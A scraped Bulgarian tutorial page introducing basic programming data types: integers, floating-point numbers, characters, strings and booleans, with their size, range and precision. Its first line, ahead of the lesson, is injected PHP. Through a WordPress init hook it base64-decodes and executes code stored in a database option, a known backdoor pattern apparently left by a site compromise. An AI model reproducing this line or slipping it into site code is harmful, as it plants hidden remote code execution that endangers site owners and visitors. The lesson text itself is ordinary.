add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Основни типове данни

Основни типове данни

Основни типове данни

Определение

В програмирането, тип данни е набор от стойности и предварително определени операции за манипулиране на тези стойности. Определението е малко “сухичко”, затова ще дадем няколко примера. В живота си използваме различни типове данни:

  • азбука(набор от символи)
  • имена(последователност от символи)
  • възраст(цели числа)
  • цени(дробни числа)
  • …както и много други.

Светът на компютрите не е нищо друго, а отражение на реалния свят в компютъра. Затова в повечето езици за програмиране използваме различни типове данни за представяне на информацията.

Всеки тип данни има свои специфики. Докато един тип може да е подходящ за дадена ситуация, може да не работи добре в друга. Затова е добре да познаваме различните варианти, с които разполагаме – техните характеристики, предимства и недостатъци. Преди да погледнем самите типове, нека разгледаме техните параметри: цел, размер, обхват, знакови, точност.

Характеристики на типовете данни

Цел

Очевидно целта на числените типове са да представят числа. В зависимост от техния размер, те имат от малък до много голям обхват. Също така има типове, които представят само цели числа, а други – дробни числа. Други типове представят единичен симво, последователност от символи, стойност за истинност(булеви стойности).

Размер

Различните данни изискват различен обем памет за тяхното запазване. Този обем се измерва в байтове, на кратко “B” или на кирилица “Б”.

Обхват

Той се отнася само за числените типове. В зависимост от големината на числата, които можем да запазим, имаме различни типове. Например, ако ще пазим възраст на човек ще използваме малък тип данни. Ако ще пазим големи числа, като брой секунди изминали за дадем период от време ще използваме по-голям тип.

Знакови и беззнакови

Знаковите типове могат да представят както положителни, така и отрицателни стойности. Беззнаковите типове съдържат само положителни числа. Това позволява на същия обем памет да се пазят до два пъти по-големи положителни числа. Някои езици за програмиране на поддържат беззнакови типове.

Точност

Точността е характеристика на типове данни, представящи дробни числа. Точността е колко знака след десетичната запетая могат да бъдат запомнени.

Целочислени типове

Този тип данни служи за представяне на цели числа. Има няколко целочислени типа, в зависимост от техния обхват. По подразбиране всички типове са със знак.

Типове с плаваща запетая

Те служат за представяне на дробните числа. Тези типове имат определена точност.

Символен тип

Този тип е предвиден за представяне на отделни символи. Всяка стойност е точно един символ(например ‘А’, ‘1’, ‘%’). Забележете, че стойностите от този тип задължително се поставят в апострофи. В компютъра символите се представят с цифров код. Езици като C, C++ използват еднобайтов код, а други езици като Java, C# използват 2 байта код. Символен тип може да се използва, когато се четат данни от клавиатурата.

Символен низ

Често ще го стрещате като “стрингов тип” или “string”. Този тип няма фиксиран размер. Паметта, която заема зависи от дължината на низът, който се запазва. Тези стойности винаги се поставят в кавички “Иван”, “+359 0123…”.

Булев тип

Съдържа стойност за истинност – true или false. Обикновено се използва за запомняне на дадено състоятние или резултат от пресмятане на логисеки израз.

 

Следващ урок: Променливи
Предишен урок: Представяне на алгоритми с блок-схеми

Виж още уроци

Върни се от “основни типове данни” към началната страница на НАРС.

 

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad